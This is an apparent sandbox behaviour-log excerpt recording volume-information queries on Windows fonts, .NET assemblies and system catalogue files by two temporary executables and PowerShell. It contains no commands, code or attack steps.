Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\31F4.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
